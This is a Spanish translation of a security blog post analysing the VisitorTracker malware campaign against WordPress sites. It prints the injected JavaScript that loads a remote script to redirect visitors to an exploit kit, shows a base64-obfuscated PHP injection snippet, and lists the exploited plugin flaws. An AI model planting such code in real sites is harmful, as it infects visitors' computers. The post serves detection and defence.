Malware en WordPress – Actualización de la Campaña VisitorTracker

Conocimiento pertenece al mundo
Tweet about this on TwitterShare on FacebookShare on LinkedInShare on Google+Share on StumbleUponShare on TumblrShare on RedditPin on PinterestEmail this to someone

En las últimas 3 semanas, hemos seguido una campaña de malware que compromete miles de sitios web de WordPress con código malicioso VisitorTracker.

Inicialmente, hemos publicado algunos detalles sobre este problema en este post:Malware de WordPress – Campaña Active VisitorTracker, pero como la campaña y el código malicioso han evoluido, hemos decidido fornecer una actualización sobre lo que está ocurriendo.

Para saber el tamaño de esta campaña, hemos registrado el número de sitios web comprometidos detectados en las últimas tres semanas:

trend

Como se puede observar en el gráfico anterior, la campaña comenzó relativamente pequeña, alcanzó su punto máximo hace 10 días, dejó caer su ritmo y ganó impulso en los últimos 3 días.

Evolución del Malware

El código malicioso empezó muy simple. Modificó los encabezados y pies de página del sitio web y añadió un javascript para redirigir a los visitantes a la página de aterrizaje delNuclear Exploit Kit. Esas páginas intentaran utilizar un gran número de exploits de navegadores para infectar a los ordenadores de los visitantes.

Esa es una técnica muy común utilizada por los creadores de malware. Sigue el código:

var visitortrackerin = setInterval(function(){
if(document.body != null && typeof document.body != "undefined"){
clearInterval(visitortrackerin);
..
var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
if(visitorTracker_ isMob ()){
var visitortrackervs [=] document.createElement("script'); visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch[.]php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
}else{
if((isIE && !isChrome && !visitorTracker_isMob())){
var visitortrackervs = document [.] createElement("script"); visitortrackervs[.]src = "http://test.com/components/com_banners/models/main_configuration/watch.php"; document.getElementsByTagName("head")[0][.[appendChild(visitortrackervs);

 

 

Si usted comprende JavaScript, se puede ver que el código está creando otra llamada remota para cargar el contenido de un archivo watch.php en el sitio web comprometido. Este archivo, que controla la página Nuclear sería utilizado. También se utiliza este archivo para ocultar el malware de algunas direcciones IP y de usuarios con el objetivo de dificultar su detección.

Pero él ha evoluido…

El código original era fácil de encontrar y de hacer su debug, pero la última iteración es mucho más compleja. Ella incluía varias capas de cifrado y el resultado final fue una pieza de código inyectado en cada archivo Javascript del sitio web:

trend_

El código PHP también ha sido cambiado, pero permanece usando los arquivos del encabezado/pie de página. Ellos agregaron una obfuscación base64 simples:

<?php @ob_start( ); @ini_set('display_errors",0); @error_reporting(0)[;]echo base64_decode [(]"PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcH...

Si usted sospecha que su sitio web había ha sido comprometido, estos son nuevos indicios de compromiso que hay que buscar.

WordPress Exploit Kit

Además de la evolución de la campaña de malware por sí sola, hemos pasado las últimas 3 semanas intentando identificar cómo estos sitios web estaban siendo hackeados. Cuanto más sitios web investigábamos, más temas y plugins diferente víamos utilizarse en la campaña.

Podemos decir seguramente que no hay sólo una víctima: sea un plugin o un tema que se explora en esta campaña.

El grupo de malware malicioso detrás de esta campaña, en realidad, está utilizando un tipo de Exploit Kit para WordPress, que intenta combinar exploits para lograr sus objetivos. Algunas de las vulnerabilidades más comunes explotadas en este kit son:

  • GravityForms RCE
  • RevSlider RCE
  • Contact Form 7 RFI
  • TimThumb AFU (sí, aún timthumb)
  • MailPoet AFU
  • Intentos de ataques de fuerza bruta contra la cuenta admin

Otro factor que contribuye a la campaña se clasifica como cross-site-contaminations:
se utiliza un sitio web pequeño y menos importante para comprometer otros sitios web más importantes dentro del mismo servidor/cuenta. Esto sucede muy a menudo en entornos compartidos, donde un debug olvidado o un sitio web de prueba que no se actualizó son usados para comprometer todo el servidor.

¡Proteja sus sitios web!

Hemos detectado miles de sitios web comprometidos con este malware en las últimas 3 semanas, más del 92% son WordPress.

Si usted es un usuario de WordPress, asegúrese de mantener todos sus plugins actualizados, incluyendo los plugins premium. Escáner de Malware / Seguridad Gratuito (SiteCheck), para asegurarse de que no ha sido afectado por esta campaña. Si usted es un administrador del sistema y tiene acceso a su servidor, puede utilizar el siguiente comando (grep) para buscar infecciones en sus archivos:

grep -r “PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcH” /var/www/


Una vez identificada, se recomienda eliminar la infección y buscar otros indicadores de infección. Si necesita ayuda profesional, nuestro equipo de seguridad está listo para ayudarlo.

Fuente:https://blog.sucuri.net/
Conocimiento pertenece al mundo
Tweet about this on TwitterShare on FacebookShare on LinkedInShare on Google+Share on StumbleUponShare on TumblrShare on RedditPin on PinterestEmail this to someone